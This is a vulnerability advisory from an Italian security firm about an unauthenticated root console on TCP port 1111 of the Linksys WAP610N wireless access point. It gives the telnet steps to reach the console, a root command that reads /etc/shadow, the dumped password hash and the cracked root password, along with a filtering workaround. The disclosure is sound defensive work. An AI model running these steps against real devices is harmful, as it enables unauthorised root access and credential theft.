Linksys WAP610N Unauthenticated Root Consle

2011-02-11T00:00:00
ID SECURITYVULNS:DOC:25693
Type securityvulns
Reporter Securityvulns
Modified 2011-02-11T00:00:00

Description

Secure Network - Security Research Advisory

Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges Systems affected: WAP610N (Firmware Version: 1.0.01) Systems not affected: -- Severity: High Local/Remote: Remote Vendor URL: http://www.linksysbycisco.com Author(s): Matteo Ignaccolo m.ignaccolo@securenetwork.it Vendor disclosure: 14/06/2010 Vendor acknowledged: 14/06/2010 Vendor bugfix: 14/12/2010 (reply to our request for update) Vendor patch release: ?? Public disclosure: 10/02/2010 Advisory number: SN-2010-08 Advisory URL: http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt

SUMMARY

Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.

Unauthenticated remote textual administration console has been found that allow an attacker to run system command as root user.

VULNERABILITY DETAILS

telnet <access-point IP> 1111

Command> system id Output> uid=0(root) gid=0(root)

Coomand> system cat /etc/shadow Ouptup> root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7::: Ouptup> bin::10933:0:99999:7::: Ouptup> daemon::10933:0:99999:7::: Ouptup> adm::10933:0:99999:7::: Ouptup> lp::10933:0:99999:7::: Ouptup> sync::10933:0:99999:7::: Ouptup> shutdown::10933:0:99999:7::: Ouptup> halt::10933:0:99999:7::: Ouptup> uucp::10933

root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)

List of console's command:

ATHENA_READ ATHENA_WRITE CHIPVAR_GET DEBUGTABLE DITEM DMEM DREG16 DREG32 DREG8 DRV_CAT_FREE DRV_CAT_INIT DRV_NAME_GET DRV_VAL_GET DRV_VAL_SET EXIT GENIOCTL GETMIB HELP HYP_READ
HYP_WRITE
HYP_WRITEBUFFER ITEM16 ITEM32 ITEM8 ITEMLIST MACCALIBRATE MACVARGET MACVARSET MEM_READ MEM_WRITE MTAPI PITEMLIST PRINT_LEVEL PROM_READ PROM_WRITE READ_FILE REBOOT RECONF RG_CONF_GET RG_CONF_SET RG_SHELL SETMIB SHELL STR_READ STR_WRITE SYSTEM TEST32 TFTP_GET TFTP_PUT VER

EXPLOIT

Attackers may exploit these issues through a common telnet client as explained above.

FIX INFORMATION

No patch is available.

WORKAROUNDS

Put access points on separate wired network and filter network traffic to/from 1111 tcp port.


LEGAL NOTICES ***

Secure Network (www.securenetwork.it) is an information security company, which provides consulting and training services, and engages in security research and development.

We are committed to open, full disclosure of vulnerabilities, cooperating whenever possible with software developers for properly handling disclosure.

This advisory is copyright 2009 Secure Network S.r.l. Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. It may not be edited in any way without the express consent of Secure Network S.r.l. Permission is explicitly given for insertion in vulnerability databases and similars, provided that due credit is given to Secure Network.

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. This information is provided as-is, as a free service to the community by Secure Network research staff. There are no warranties with regard to this information. Secure Network does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

If you have any comments or inquiries, or any issue with what is reported in this advisory, please inform us as soon as possible.

E-mail: securenetwork@securenetwork.it GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc Phone: +39 02 24 12 67 88